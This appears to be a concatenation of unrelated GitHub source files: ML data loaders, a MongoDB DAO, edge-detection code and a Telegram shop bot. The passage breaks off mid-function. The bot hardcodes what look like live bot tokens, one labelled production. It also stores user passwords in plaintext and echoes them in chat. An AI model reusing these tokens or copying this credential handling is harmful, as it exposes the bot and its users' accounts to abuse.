plt.imshow(target)\n\n plt.figure(3)\n plt.clf()\n plt.imshow(sample)\n img_row, img_col = target.shape\n color = make_color_seg(target, nrow=img_row, ncol=img_col)\n plt.imshow(color, alpha=0.33)\n\n plt.figure(4)\n plt.clf()\n plt.imshow(sample_aug)\n #\n plt.figure(5)\n plt.clf()\n plt.imshow(target_aug)\n\n plt.figure(6)\n plt.clf()\n plt.imshow(sample_aug)\n img_row, img_col = target_aug.shape\n color_aug = make_color_seg(target_aug, nrow=img_row, ncol=img_col)\n plt.imshow(color_aug, alpha=0.33)\n\n if self.transform is not None:\n sample = self.transform(sample_aug)\n target_aug = bound_classes(target_aug, self.num_classes)\n target = torch.from_numpy(target_aug)\n\n return sample, target\n\n def __len__(self):\n return len(self.samples)\n\n def __repr__(self):\n fmt_str = 'Dataset ' + self.__class__.__name__ + '\\n'\n fmt_str += ' Number of datapoints: {}\\n'.format(self.__len__())\n fmt_str += ' Root Location: {}\\n'.format(self.root)\n tmp = ' Transforms (if any): '\n fmt_str += '{0}{1}\\n'.format(tmp, self.transform.__repr__().replace('\\n', '\\n' + ' ' * len(tmp)))\n tmp = ' Target Transforms (if any): '\n fmt_str += '{0}{1}'.format(tmp, self.target_transform.__repr__().replace('\\n', '\\n' + ' ' * len(tmp)))\n return fmt_str\n\n\ndef cv2_loader(path, num_ch):\n if num_ch==1:\n img = cv2.imread(path, cv2.IMREAD_GRAYSCALE)\n else:\n img = cv2.imread(path)\n return img\n\n\ndef default_loader(path, seg_factor=30, num_ch=3):\n if 'seg' in path:\n temp = cv2_loader(path, num_ch=1)\n temp = temp/seg_factor\n return temp.astype(np.uint8)\n else:\n return cv2_loader(path, num_ch=num_ch)\n\n\ndef bound_classes(target_aug, num_classes):\n target_aug = np.maximum(target_aug, np.zeros(target_aug.shape))\n target_aug = np.minimum(target_aug, np.full(target_aug.shape, fill_value=num_classes - 1))\n return target_aug\n\n\ndef shadows(ori, visualise=False):\n ori_out = ori.copy()\n\n h, w = ori.shape\n # want shadows in middlish areas\n h_lim = 200\n h_height = 100\n w_width = 10\n\n h_start = int(h_lim * random.random()) + ((h-1)-h_lim)\n h_end = h_start + int(h_height*random.random())\n w_start = int(w * random.random())\n w_end = w_start + int(w_width*random.random())\n\n shadow_amt = random.uniform(0.6, 0.8)\n ori_out[h_start:h_end, w_start:w_end] = np.round(shadow_amt * ori[h_start:h_end, w_start:w_end] )\n\n if visualise:\n import matplotlib.pyplot as plt\n plt.figure(1)\n plt.clf()\n plt.imshow(ori)\n\n plt.figure(2)\n plt.clf()\n plt.imshow(ori_out)\n return ori_out\n\n\nclass ImageFolder(DatasetFolder):\n def __init__(self, root, transform=None, loader=default_loader, img_size=256, num_ch=3, num_classes=8, seg_factor=1,\n aug_options=None, col_size=None):\n super(ImageFolder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform,\n img_size=img_size,\n num_ch=num_ch,\n num_classes=num_classes,\n seg_factor=seg_factor,\n aug_options=aug_options,\n col_size=col_size)\n self.imgs = self.samples\n","repo_name":"18072193589/ganseg-3","sub_path":"Deep-Learing/NetModel/ganseg-3/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":10229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"74635166083","text":"import pymongo\nimport logging\n\nfrom typing import Mapping, Union, List\n\n\nclass Singleton(type):\n \"\"\"\n Meta class. Ensures that class has only one instance.\n https://sourcemaking.com/design_patterns/singleton\n https://sourcemaking.com/design_patterns/singleton/python/1\n \"\"\"\n\n def __init__(cls, name, bases, attrs, **kwargs):\n super().__init__(name, bases, attrs)\n cls._instance = None\n\n def __call__(cls, *args, **kwargs):\n if cls._instance is None:\n cls._instance = super().__call__(*args, **kwargs)\n return cls._instance\n\n\nclass MongoDBDAO(metaclass=Singleton):\n '''\n This class plays a role of the Data Access Object (DAO) for MongoDB.\n It contains main CRUD operations (Create, Read, Update and Delete), used by BRISE to operate with a database\n '''\n def __init__(self, mongo_host: str, mongo_port: int, database_name: str, user: str, passwd: str):\n self.client = pymongo.MongoClient(f\"mongodb://{user}:{passwd}@{mongo_host}:{mongo_port}/?authSource=admin\")\n self.database = self.client[database_name]\n self.logger = logging.getLogger(__name__)\n\n def write_one_record(self, collection_name: str, record: Mapping) -> None:\n collection = self.database[collection_name]\n x = collection.insert_one(record)\n self.logger.debug(\"Written to mongo. Id: \" + str(x.inserted_id))\n\n def write_many_records(self, collection_name: str, records: List[Mapping]) -> None:\n collection = self.database[collection_name]\n x = collection.insert_many(records)\n self.logger.debug(\"Written many to mongo. Id: \" + str(x.inserted_ids))\n\n def get_records(self,\n collection_name: str,\n filter_: Union[Mapping, None],\n projection: Union[Mapping, List, None]) -> List[Mapping]:\n result = []\n collection = self.database[collection_name]\n for record in collection.find(filter_, projection=projection):\n result.append(dict(record))\n return result\n\n def get_last_record(self,\n collection_name: str,\n filter_: Union[Mapping, None],\n projection: Union[Mapping, List, None]) -> Union[Mapping, None]:\n collection = self.database[collection_name]\n records = collection.find(filter_, projection=projection)\n if records.count() > 0:\n for record in records.skip(records.count() - 1):\n return dict(record)\n else:\n return None\n\n def update_record(self, collection_name: str, filter_: Mapping, new_val: Mapping) -> None:\n collection = self.database[collection_name]\n new_values = {\"$set\": new_val}\n collection.update_one(filter_, new_values)\n","repo_name":"YevheniiSemendiak/text_matcher","sub_path":"back/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"31621652082","text":"import math\n\nfrom modAL.models import base\nfrom modAL.utils import data as mod_data\nimport numpy as np\n\n\ndef greedy(optimizer,\n features,\n n_instances = 1):\n \"\"\"Takes the best instances by inference value sorted in ascending order.\n\n Args:\n optimizer: BaseLearner. Model to use to score instances.\n features: modALinput. Featurization of the instances to choose from.\n n_instances: Integer. The number of instances to select.\n\n Returns:\n Indices of the instances chosen.\n \"\"\"\n return np.argpartition(optimizer.predict(features), n_instances)[:n_instances]\n\n\ndef half_sample(optimizer,\n features,\n n_instances = 1,\n alpha = 1.0):\n \"\"\"Chooses the instances with the highest uncertainty.\n\n Args:\n optimizer: BaseLearner. Model to use to score instances.\n features: modALinput. Featurization of the instances to choose from.\n n_instances: Integer. The number of instances to select.\n alpha: Float. Half sampling weighting parameter. Higher weights will bias\n towards better inference values.\n\n Returns:\n Indices of the instances chosen.\n \"\"\"\n predictions = optimizer.predict(features)\n\n half_differences = (\n (np.sign(predictions[::2]) * np.abs(predictions[::2])**alpha -\n np.sign(predictions[1::2]) * np.abs(predictions[1::2])**alpha) / 2).T\n\n num_splits = half_differences.shape[1]\n delta = half_differences / np.sqrt(num_splits)\n picked_indices = []\n big_h = np.eye(num_splits)\n\n selectable = np.ones(len(delta))\n\n for _ in range(n_instances):\n delta_transpose_delta = np.matmul(np.transpose(delta), delta)\n variances = np.sum(delta * delta, axis=1)\n\n candidate_score = selectable * np.sum(\n np.matmul(delta, delta_transpose_delta) * delta,\n axis=1) / (1 + variances)\n\n best_score = np.argmax(candidate_score)\n picked_indices.append(best_score)\n selectable[best_score] = 0\n\n best_delta = delta[best_score, :] / math.sqrt(variances[best_score])\n\n best_lambda = 1 - 1 / math.sqrt(1 + variances[best_score])\n update = np.eye(num_splits) - best_lambda * np.outer(best_delta, best_delta)\n\n delta = np.matmul(delta, update)\n\n big_h = np.matmul(big_h, update)\n\n return np.array(picked_indices)\n","repo_name":"google-research/google-research","sub_path":"al_for_fep/selection/acquisition_functions.py","file_name":"acquisition_functions.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":31433,"dataset":"github-code","pt":"99"} +{"seq_id":"12131899970","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n# takes image, mean and psnr value and returns the corresponding noisy image\n# (2d numpy array)\ndef noise(img, mean, psnr):\n (rows, cols) = img.shape\n # x max and y max for image\n i_min = img.min()\n i_max = img.max()\n # find sigma for a given psnr\n sigma = (i_max-i_min)/(10**(psnr/20))\n\n # random.normal is used to create white noise with mean, sigma parameters\n white_noise_img = np.random.normal(mean, sigma, (rows, cols))\n white_noise_img = white_noise_img.reshape(rows, cols)\n noisy = img + white_noise_img\n return noisy\n\n\n# returns 2d gaussian (numpy array) for a given sigma\ndef get_gaussian(sigma, plot=False):\n n = int(np.ceil(3*sigma)*2+1)\n gauss1D = cv2.getGaussianKernel(n, sigma)\n # 2d gaussian equals to matrix multiplication of 1d gaussian with the equivalent reversed\n gauss2D = gauss1D @ gauss1D.T\n # plot gaussian\n if plot:\n hf = plt.figure()\n ax = hf.add_subplot(111, projection='3d')\n\n # define x, y axis\n X = np.arange(-(n-1)/2, (n-1)/2+1, 1)\n Y = np.arange(-(n-1)/2, (n-1)/2+1, 1)\n X, Y = np.meshgrid(X, Y)\n # z is 2d gaussian function\n Z = gauss2D\n ax.plot_surface(X, Y, Z)\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.set_title('Gaussian for sigma = '+str(sigma))\n plt.show()\n return gauss2D\n\n# returns Laplacian of Gaussian for a given sigma\n# 2d numpy array\ndef get_LoG(sigma, plot=False):\n n = int(np.ceil(3*sigma)*2+1)\n # define kernel for LoG\n # (0,0) -> center of array\n # (abs(n-1)/2) -> edges of array\n vect = np.linspace(-(n-1)/2, (n-1)/2, n)\n [xs, ys] = np.meshgrid(vect, vect)\n # compute LoG with known mathematical type\n nom = (np.square(xs) + np.square(ys) - 2*(sigma**2))\n den = 2*np.pi*(sigma**6)\n exp = np.exp(-(np.square(xs)+np.square(ys))/(2*(sigma**2)))\n LoG = (nom/den)*exp\n # plot gaussian\n if plot:\n hf = plt.figure()\n ax = hf.add_subplot(111, projection='3d')\n X = np.arange(-(n - 1) / 2, (n - 1) / 2 + 1, 1)\n Y = np.arange(-(n - 1) / 2, (n - 1) / 2 + 1, 1)\n X, Y = np.meshgrid(X, Y)\n Z = LoG\n ax.plot_surface(X, Y, Z)\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.set_title('LoG for sigma = ' + str(sigma))\n plt.show()\n return LoG\n\n# returns convoluted image for a given kernel\ndef convolution(img, kernel):\n result = cv2.filter2D(img, -1, kernel)\n return result\n\n# takes image read with cv2 and\n# returns 2d numpy array, non linear laplacian of image\ndef non_linear_laplacian(img):\n # define kernel for morphological filters\n kern = np.array([\n [0, 1, 0],\n [1, 1, 1],\n [0, 1, 0]\n ], dtype=np.uint8)\n dilated_img = cv2.dilate(img, kern)\n eroded_img = cv2.erode(img, kern)\n non_lin = dilated_img + eroded_img - 2*img\n return non_lin\n\n# takes image, converts it to binary and returns\n# dilated minus eroded image which is a\n# 2d numpy array\ndef zero_crossings(img):\n binary = (img >= 0).astype(np.float)\n kern = np.array([\n [0, 1, 0],\n [1, 1, 1],\n [0, 1, 0]\n ], dtype=np.uint8)\n dilated_img = cv2.dilate(binary, kern)\n eroded_img = cv2.erode(binary, kern)\n frontier = dilated_img - eroded_img\n return frontier\n\n\ndef smooth_decline(img, theta):\n (xs, ys) = np.gradient(img)\n gradient = np.sqrt(np.square(xs) + np.square(ys))\n I_max = gradient.max()\n result = (gradient > theta * I_max)\n return result\n\n\ndef edge_detection(img, sigma, theta, linear):\n gaussian_kernel = get_gaussian(sigma)\n gaussian = convolution(img, gaussian_kernel)\n\n if linear:\n log_kernel = get_LoG(sigma)\n laplacian = convolution(img, log_kernel)\n\n else:\n laplacian = non_linear_laplacian(gaussian)\n\n crossings = zero_crossings(laplacian)\n (xs, ys) = np.gradient(gaussian)\n grad = np.sqrt(np.square(xs)+np.square(ys))\n I_max = grad.max()\n return ((grad > theta*I_max) & (crossings == 1.0)).astype(np.float)\n\n# returns real edges of image without noise\n# dilation - erosion\ndef real_edges(img, theta):\n kern = np.array([\n [0, 1, 0],\n [1, 1, 1],\n [0, 1, 0]\n ], dtype=np.uint8)\n dilated_img = cv2.dilate(img, kern)\n eroded_img = cv2.erode(img, kern)\n frontier = dilated_img - eroded_img\n return frontier > theta\n\n# returns rating for our edge detection based on real edges of image.\ndef rating(found, real):\n # D and T (where D set of edges found from us and T set of real edges)\n intersection = found.astype(bool) & real.astype(bool)\n inter_sum = intersection.sum() # card(D and T)\n found_sum = found.sum() # card(D)\n real_sum = real.sum() # card(T)\n small = np.exp(-10)\n prdt = inter_sum/(real_sum+small)\n prtd = inter_sum/(found_sum+small)\n return (prdt+prtd)/2\n\ndef search_best_rating(noisy, linear, real_edge):\n sigma_end = 10.0\n sigma_step = 0.1\n theta_end = 1.0\n theta_step = 0.01\n best_rating = sigma_i = theta_i = 0\n for sigma in np.arange(0.0000000000000000000001, sigma_end, sigma_step):\n for theta in np.arange(0.0000000000000000000001, theta_end, theta_step):\n new_rating = rating(edge_detection(noisy, sigma, theta, linear), real_edge)\n if new_rating > best_rating:\n best_rating = new_rating\n sigma_i = sigma\n theta_i = theta\n print(best_rating, sigma_i, theta_i)\n edge = edge_detection(noisy, sigma_i, theta_i, True)\n plt.imshow(edge, cmap='gray')\n plt.show()\n\n\nif __name__ == '__main__':\n\n image = 'edgetest_10.png'\n # read image\n img = cv2.imread(image, cv2.IMREAD_GRAYSCALE)\n img = img.astype(np.float) / 255\n\n # display the image\n plt.imshow(img, cmap='gray')\n plt.show()\n\n # put noise in image\n noisy_20 = noise(img, 0, 20)\n plt.imshow(noisy_20, cmap='gray')\n plt.show()\n noisy_10 = noise(img, 0, 10)\n plt.imshow(noisy_10, cmap='gray')\n plt.show()\n\n \n # find and show real edges\n real_edge = real_edges(img, 0.15)\n plt.imshow(real_edge, cmap='gray')\n plt.show()\n\n\n\n # find best edges for linear laplacian of image\n # for PSNR=20dB\n search_best_rating(noisy_20, True, real_edge)\n '''\n # for PSNR=10dB\n search_best_rating(noisy_10, True, real_edge)\n\n # find best edges for non linear laplacian of image\n # for PSNR=20dB\n search_best_rating(noisy_20, False, real_edge)\n\n # for PSNR=10dB\n search_best_rating(noisy_10, False, real_edge)\n '''\n image = 'coffee.jpg'\n # read image\n img = cv2.imread(image, cv2.IMREAD_GRAYSCALE)\n img = img.astype(np.float) / 255\n color_img = cv2.imread(image, cv2.IMREAD_COLOR)\n color_img = cv2.cvtColor(color_img, cv2.COLOR_BGR2RGB)\n # display the image\n #plt.imshow(color_img)\n #plt.show()\n # edge detection\n edge = edge_detection(img, 2, 0.015, True)\n plt.imshow(edge, cmap='gray')\n plt.show()\n","repo_name":"michalakos/ComputerVision","sub_path":"lab1/code/lab1_1.py","file_name":"lab1_1.py","file_ext":"py","file_size_in_byte":7037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"15093189187","text":"import os\nfrom scipy.spatial.distance import cdist\n\n\ndef compute_distance(embeddings1, embeddings2, audio_folder, image_folder):\n audio_files = os.listdir(audio_folder) if os.path.isdir(audio_folder) else []\n image_files = os.listdir(image_folder) if os.path.isdir(image_folder) else []\n\n distance_dict = {}\n\n for i in range(len(embeddings2)):\n audio_file = os.path.basename(audio_files[i]) if i < len(audio_files) else None\n image_file = os.path.basename(image_files[i]) if i < len(image_files) else None\n distance = cdist([embeddings1], [embeddings2[i]], metric='euclidean')[0][0]\n distance_dict[audio_file] = {\n 'image_file': image_file,\n 'distance': distance\n }\n\n return distance_dict\n\n\n\n\n\n\n\n","repo_name":"mariasanruiz/Pipeline-DistanceMetric","sub_path":"distances.py","file_name":"distances.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"23551070973","text":"import asyncio\nimport logging\nimport sys\nfrom aiogram import Bot, Dispatcher, Router, types\nfrom aiogram.enums import ParseMode\nfrom aiogram.filters import Command\nfrom aiogram.types import Message, CallbackQuery\nfrom aiogram.fsm.context import FSMContext\nfrom aiogram.types import InlineKeyboardButton, KeyboardButton, InlineKeyboardMarkup, CallbackQuery, ReplyKeyboardMarkup\nfrom aiogram.types.web_app_info import WebAppInfo\nfrom aiogram import F\nfrom aiogram.utils.keyboard import InlineKeyboardBuilder\nfrom aiogram.methods.send_message import SendMessage\n\nfrom states import *\nfrom db import *\nfrom texts import *\n\n\n# test - 6748840687:AAEah69Bw4LUvpc43bcGA_Hr19_u98TZiJo\n# production - 6565334685:AAFMrkMnbIAB_x8DjHx9494idO8N0qCcoAs\nTOKEN = '6565334685:AAFMrkMnbIAB_x8DjHx9494idO8N0qCcoAs'\n\ndp = Dispatcher()\n\n\n@dp.callback_query(Login.input_login, F.data == \"back\")\n@dp.callback_query(Misc.misc, F.data == \"back\")\n@dp.callback_query(MakeOrder.choose_product, F.data == \"back\")\n@dp.callback_query(TrackOrder.choose_order, F.data == \"back\")\n@dp.callback_query(DeliveryMethods.delivery_methods, F.data == \"back\")\n@dp.callback_query(PaymentMethods.payment_methods, F.data == \"back\")\n@dp.callback_query(CreateAccount.get_name_and_surname,\n F.data == \"back\")\nasync def start_command(callback: types.CallbackQuery, state: FSMContext):\n await state.set_state(StartState.start_state)\n kb = InlineKeyboardBuilder()\n kb.adjust(1)\n login_button = InlineKeyboardButton(text=\"Войти\", callback_data=\"login\")\n create_account_button = InlineKeyboardButton(text=\"Создать аккаунт\", callback_data=\"create account\")\n\n create_order_button = InlineKeyboardButton(text=\"Создать заказ\", callback_data=\"create order\")\n track_order_button = InlineKeyboardButton(text=\"Отследить заказ\", callback_data=\"track order\")\n logout_button = InlineKeyboardButton(text=\"Выйти из аккаунта\", callback_data=\"logout\")\n get_contacts = InlineKeyboardButton(text=\"Контакты\", callback_data=\"get contacts\")\n check_status = InlineKeyboardButton(text=\"Узнать статус заказа\", callback_data=\"check status\")\n check_availability = InlineKeyboardButton(text=\"Узнать наличие\", callback_data=\"check availability\")\n how_to_search = InlineKeyboardButton(text=\"Как найти товар\", callback_data=\"how to search\")\n grafik_raboty = InlineKeyboardButton(text=\"График работы\", callback_data=\"grafik raboty\")\n how_to_get = InlineKeyboardButton(text=\"Как добраться\", callback_data=\"how to get\")\n delivery_methods = InlineKeyboardButton(text=\"Способы доставки\", callback_data=\"delivery methods\")\n payment_methods = InlineKeyboardButton(text=\"Способы оплаты\", callback_data=\"payment methods\")\n\n if check_chat_id_in_db(callback.from_user.id):\n if check_authorisation(callback.from_user.id):\n authorised_buttons = [create_order_button, track_order_button, check_status, check_availability,\n how_to_search, how_to_get, grafik_raboty, delivery_methods, payment_methods, logout_button, get_contacts]\n for button in authorised_buttons:\n kb.add(button)\n else:\n kb.add(login_button)\n else:\n buttons = [login_button, create_account_button]\n for button in buttons:\n kb.add(button)\n kb.adjust(1)\n await callback.message.answer(text='Привет, я бот магазина centrmag, выберите желаемое '\n 'действие', reply_markup=kb.as_markup())\n\n\n@dp.message(Command('start'))\nasync def start_command(message: types.Message, state: FSMContext):\n await state.set_state(StartState.start_state)\n kb = InlineKeyboardBuilder()\n kb.adjust(1)\n login_button = InlineKeyboardButton(text=\"Войти\", callback_data=\"login\")\n create_account_button = InlineKeyboardButton(text=\"Создать аккаунт\", callback_data=\"create account\")\n\n create_order_button = InlineKeyboardButton(text=\"Создать заказ\", callback_data=\"create order\")\n track_order_button = InlineKeyboardButton(text=\"Отследить заказ\", callback_data=\"track order\")\n logout_button = InlineKeyboardButton(text=\"Выйти из аккаунта\", callback_data=\"logout\")\n get_contacts = InlineKeyboardButton(text=\"Контакты\", callback_data=\"get contacts\")\n check_status = InlineKeyboardButton(text=\"Узнать статус заказа\", callback_data=\"check status\")\n check_availability = InlineKeyboardButton(text=\"Узнать наличие\", callback_data=\"check availability\")\n how_to_search = InlineKeyboardButton(text=\"Как найти товар\", callback_data=\"how to search\")\n grafik_raboty = InlineKeyboardButton(text=\"График работы\", callback_data=\"grafik raboty\")\n how_to_get = InlineKeyboardButton(text=\"Как добраться\", callback_data=\"how to get\")\n delivery_methods = InlineKeyboardButton(text=\"Способы доставки\", callback_data=\"delivery methods\")\n payment_methods = InlineKeyboardButton(text=\"Способы оплаты\", callback_data=\"payment methods\")\n\n if check_chat_id_in_db(message.from_user.id):\n if check_authorisation(message.from_user.id):\n authorised_buttons = [create_order_button, track_order_button, check_status, check_availability,\n how_to_search, how_to_get, grafik_raboty, delivery_methods, payment_methods, logout_button, get_contacts]\n for button in authorised_buttons:\n kb.add(button)\n else:\n kb.add(login_button)\n else:\n buttons = [login_button, create_account_button]\n for button in buttons:\n kb.add(button)\n kb.adjust(1)\n await message.answer(text='Привет, я бот магазина centrmag, выберите желаемое '\n 'действие', reply_markup=kb.as_markup())\n\n\ndef create_kb():\n kb = InlineKeyboardBuilder()\n cancel_button = InlineKeyboardButton(text=\"Назад\", callback_data=f'back')\n kb.add(cancel_button)\n return kb\n\n\n@dp.callback_query(F.data == \"create account\")\nasync def create_account(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=\"Введите свои имя и фамилию через пробел\",\n reply_markup=kb.as_markup())\n await state.set_state(CreateAccount.get_name_and_surname)\n\n\n@dp.message(CreateAccount.get_name_and_surname)\nasync def get_name_and_surname(message: Message, state: FSMContext):\n flag = False\n kb = create_kb()\n try:\n name, surname = message.text.split(' ')\n flag = True\n except Exception as ex:\n print(ex)\n await message.answer(text=\"Введите два слова: имя и фамилию через пробел\",\n reply_markup=kb.as_markup())\n if flag:\n await state.update_data(name=name)\n await state.update_data(surname=surname)\n await message.answer(text=\"Введите свою электронную почту\", reply_markup=kb.as_markup())\n await state.set_state(CreateAccount.get_email)\n else:\n await state.set_state(CreateAccount.get_name_and_surname)\n\n\n@dp.callback_query(CreateAccount.get_email, F.data == \"back\")\nasync def back_to_name_and_surname(callback: CallbackQuery, state: FSMContext):\n await state.set_state(CreateAccount.get_name_and_surname)\n kb = create_kb()\n await callback.message.answer(text=\"Введите свой ИСПРАВЛЕННЫЙ имя и фамилию\", reply_markup=kb.as_markup())\n\n\n@dp.message(CreateAccount.get_email)\nasync def get_email(message: Message, state: FSMContext):\n print(await state.get_state())\n kb = create_kb()\n await state.update_data(email=message.text)\n await message.answer(text=\"Введите свой номер телефона\", reply_markup=kb.as_markup())\n await state.set_state(CreateAccount.get_phone)\n\n\n@dp.callback_query(CreateAccount.get_phone, F.data == \"back\")\nasync def back_to_email(callback: CallbackQuery, state: FSMContext):\n await state.set_state(CreateAccount.get_email)\n print(await state.get_state())\n kb = create_kb()\n await callback.message.answer(text=\"Введите свою ИСПРАВЛЕННУЮ электронную почту\", reply_markup=kb.as_markup())\n\n\n@dp.message(CreateAccount.get_phone)\nasync def get_phone(message: Message, state: FSMContext):\n kb = create_kb()\n await state.update_data(phone_number=message.text)\n await message.answer(text=\"Придумайте пароль\", reply_markup=kb.as_markup())\n await state.set_state(CreateAccount.get_password)\n\n\n@dp.callback_query(CreateAccount.get_password, F.data == \"back\")\nasync def back_to_phone(callback: CallbackQuery, state: FSMContext):\n await state.set_state(CreateAccount.get_phone)\n kb = create_kb()\n await callback.message.answer(text=\"Введите свой ИСПРАВЛЕННЫЙ номер телефона\", reply_markup=kb.as_markup())\n\n\n# @dp.callback_query(F.data == \"back\", CreateAccount.get_password)\n@dp.message(CreateAccount.get_password)\nasync def get_password(message: Message, state: FSMContext):\n kb = create_kb()\n await state.update_data(password=message.text)\n await message.answer(text=\"Введите пароль еще раз\", reply_markup=kb.as_markup())\n await state.set_state(CreateAccount.get_password_again)\n\n\n@dp.callback_query(CreateAccount.get_password_again, F.data == \"back\")\nasync def back_to_password(callback: CallbackQuery, state: FSMContext):\n await state.set_state(CreateAccount.get_password)\n kb = create_kb()\n await callback.message.answer(text=\"Введите свой ИСПРАВЛЕННЫЙ пароль\", reply_markup=kb.as_markup())\n\n\n@dp.callback_query(F.data == \"back\", CreateAccount.get_password_again)\n@dp.message(CreateAccount.get_password_again)\nasync def get_password_again(message: Message, state: FSMContext):\n data = await state.get_data()\n kb = create_kb()\n password = data['password']\n if message.text != password:\n await message.answer(text=\"Пароли не совпадают. Попробуйте еще раз\",\n reply_markup=kb.as_markup())\n await state.set_state(CreateAccount.get_password_again)\n else:\n data_list = [data[key] for key in data.keys()]\n data_list.insert(0, message.from_user.id)\n print(data_list)\n register_user(data_list, message.from_user.id)\n await message.answer(text=\"Аккаунт создан\")\n await start_command(message, state)\n\n\n@dp.callback_query(StartState.start_state, F.data == \"login\")\nasync def login(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n if callback.data == \"login\":\n await callback.message.answer(text=\"Введите свой email\", reply_markup=kb.as_markup())\n await state.set_state(Login.input_login)\n\n\n@dp.message(Login.input_login)\nasync def input_login(message: Message, state: FSMContext):\n login = message.text\n kb = create_kb()\n if check_login_in_db(login):\n await state.update_data(login=login)\n await message.answer(text=\"Введите пароль\", reply_markup=kb.as_markup())\n await state.set_state(Login.input_password)\n else:\n await message.answer(text=f\"Введенный логин {login} не был найден. Введите еще раз\",\n reply_markup=kb.as_markup())\n await state.set_state(Login.input_login)\n\n\n@dp.callback_query(Login.input_password, F.data == \"back\")\nasync def back_to_input_login(callback: CallbackQuery, state: FSMContext):\n await state.set_state(Login.input_login)\n kb = create_kb()\n await callback.message.answer(text=\"Введите почту еще раз\", reply_markup=kb.as_markup())\n\n\n@dp.message(Login.input_password)\nasync def input_password(message: Message, state: FSMContext):\n kb = create_kb()\n entered_password = message.text\n data = await state.get_data()\n login = data['login']\n actual_password = get_password_by_email(login)\n\n if entered_password != actual_password:\n await message.answer(text=\"Неверный пароль, попробуйте снова\", reply_markup=kb.as_markup())\n else:\n set_authorised(message.from_user.id)\n await message.answer(text=\"Вход успешный\")\n await start_command(message, state)\n\n\n@dp.callback_query(StartState.start_state, F.data == \"get contacts\")\nasync def get_contacts(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n information = \"\"\"Вот наши контакты:\\n\\n +7 495 374 67 62\n\n+7 800 707 21 74\n\ninfo@centrmag.ru\n\nфакс: +7 499 713 52 39\nРозничный магазин: 125464, Россия, Москва, Пятницкое шоссе, д. 7, к. 1\n\nВремя работы:\n\nПН-ПТ 9:00-19:00\"\"\"\n await callback.message.answer(text=information, reply_markup=kb.as_markup())\n await state.set_state(Misc.misc)\n\n\n@dp.callback_query(StartState.start_state, F.data == \"create order\")\nasync def create_order(callback: CallbackQuery, state: FSMContext):\n email, password = get_login_and_password_by_id(callback.from_user.id)\n kb = create_kb()\n kb.add(InlineKeyboardButton(text=\"Перейти в веб-приложение\", web_app=WebAppInfo(url='https://www.centrmag.ru/')))\n await callback.message.answer(text=f\"Для оформления заказа вы можете перейти на сайт \"\n f\"https://www.centrmag.ru/\\n\\nДанные для входа:\\nЛогин: {email}\\nПароль: \"\n f\"{password}\\n\\nДля создания тестового заказа введите /order и следуйте инструкциям\",\n reply_markup=kb.as_markup())\n await state.set_state(MakeOrder.choose_product)\n\n\n@dp.message(MakeOrder.choose_product, Command(\"order\"))\nasync def secret_create_order(message: Message, state: FSMContext):\n text = \"Доступные товары:\\n\"\n for i in range(1, 6):\n info = get_info_about_product(i)\n text += f\"\\n\\n{i} {info[1]}, цена: {info[2]}, категория: {info[-1]}\"\n await message.answer(text=text)\n await message.answer(\n text=\"Введите заказ в следующем формате: Товар1(id) - количество1, Товар2(id) - количество2... итд\")\n await state.set_state(MakeOrder.create_order)\n\n\n@dp.message(MakeOrder.create_order)\nasync def secret_push_order(message: Message, state: FSMContext):\n items = message.text.split(', ')\n order_id = create_order_in_db(message.from_user.id, \"paid\")\n order_sum = 0\n for item in items:\n product_id, quantity = item.split(' - ')\n price = int(get_product_price_by_id(product_id))\n summa = price * int(quantity)\n order_sum += summa\n insert_order_item(order_id, product_id, quantity, summa)\n push_order_sum(order_id, order_sum)\n await message.answer(text=f\"Заказ создан! ID заказа: {order_id}, чтобы посмотреть детали, нажмите на кнопку \"\n f\"'Отследить заказы на главном меню'\\n\\n Нажмите /start\")\n\n\n@dp.callback_query(StartState.start_state, F.data == \"track order\")\n@dp.callback_query(TrackOrder.track_order, F.data == \"back\")\nasync def choose_order(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n orders = get_orders_by_chat_id(callback.from_user.id)\n if not orders:\n await state.set_state(TrackOrder.choose_order)\n await callback.message.answer(text=\"У вас пока нет заказов, вы можете оформить их в разделе 'Создать заказ'\",\n reply_markup=kb.as_markup())\n else:\n await state.update_data(orders=orders)\n for order in orders:\n order_date = order[1].split(' ')[0]\n order_button = InlineKeyboardButton(text=f\"№{order[0]} от {order_date} на сумму {order[-1]} руб\",\n callback_data=f\"order: {order[0]}\")\n kb.add(order_button)\n kb.adjust(1)\n await callback.message.answer(text=\"Выберите заказ из предложенного снизу или введите номер заказа\",\n reply_markup=kb.as_markup())\n await state.set_state(TrackOrder.choose_order)\n\n\n@dp.callback_query(TrackOrder.choose_order)\nasync def track_order(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n order_id = int(callback.data.split(': ')[1])\n order_info = get_info_about_order(order_id)\n order_statuses = {\"new\": \"Новый\", \"paid\": \"Оплаченный\"}\n text = f\"Заказ № {order_id}\\nДата: {order_info[1]}\\nСтатус: {order_statuses[order_info[2]]}\\nСумма заказа: {order_info[-1]} руб\\n\\nДетали:\\n\\n\"\n\n order_items = get_items_by_order_id(order_id)\n for item in order_items:\n item_name, item_quantity, item_summa = item\n text += f\"Товар: {item_name}\\nКоличество: {item_quantity}\\nИтого за товар: {item_summa} руб\\n\\n\"\n\n await callback.message.answer(text=text, reply_markup=kb.as_markup())\n await state.set_state(TrackOrder.track_order)\n\n\n@dp.message(TrackOrder.choose_order)\nasync def m_choose_order(message: Message, state: FSMContext):\n order_id = int(message.text)\n data = await state.get_data()\n flag = False\n for order in data['orders']:\n if order_id == 